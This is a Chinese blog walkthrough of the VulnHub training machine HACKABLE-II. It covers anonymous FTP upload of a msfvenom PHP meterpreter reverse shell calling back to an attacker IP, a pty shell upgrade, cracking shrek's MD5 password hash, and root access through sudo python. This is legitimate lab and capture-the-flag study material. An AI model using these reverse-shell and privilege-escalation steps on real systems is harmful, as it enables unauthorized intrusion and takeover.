『vulnhub系列』HACKABLE-II
『vulnhub系列』HACKABLE-II
下载地址:
1 | https://www.vulnhub.com/entry/hackable-ii,711/ |
信息搜集:
使用nmap探测存活主机,发现主机开启了21,22和80端口
访问80端口的web服务,发现apache默认页面
使用dirsearch进行目录爆破,发现files
目录
1 | dirsearch -u "http://192.168.199.135/" |
访问files
页面发现CALL.html
访问CALL.html
发现只有一段话
这条路的线索暂时断了,我们使用匿名登录ftp,发现CALL.html
1 | ftp 192.168.199.135 |
get
之后发现就是我们刚刚在files中发现的CALL.html
漏洞利用:
此时我们上传反弹shell(使用msfvenom生成)
1 | msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.199.129 lport=4444 -o re_shell.php |
进入files
文件,发现我们刚刚上传的re_shell.php
我们使用msfconsole进行监听
1 | msfconsole |
开启监听后,访问re_shell.php
,反弹成功
进入shell,使用python开启交互式shell
1 | python3 -c "import pty;pty.spawn('/bin/bash')" |
提升权限:
我们在/home
中发现了important.txt
,读取发现“运行脚本发现数据”
读取/.runme.sh
发现secret key
trolled 还有下面的shrek:cf4c2232354952690368f1b3dfdfb24d
使用md5解密得到密码onion
切换sherk
,使用密码onion
,登陆成功
获得user.txt
使用sudo -l
查看当前用户可以以root
权限执行的命令,发现python
命令可以以root
权限提权
此时我们使用python
进行提权,成功
1 | sudo python3.5 -c 'import os;os.system("/bin/bash");' |
得到root.txt
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Don_Joshua's Blog!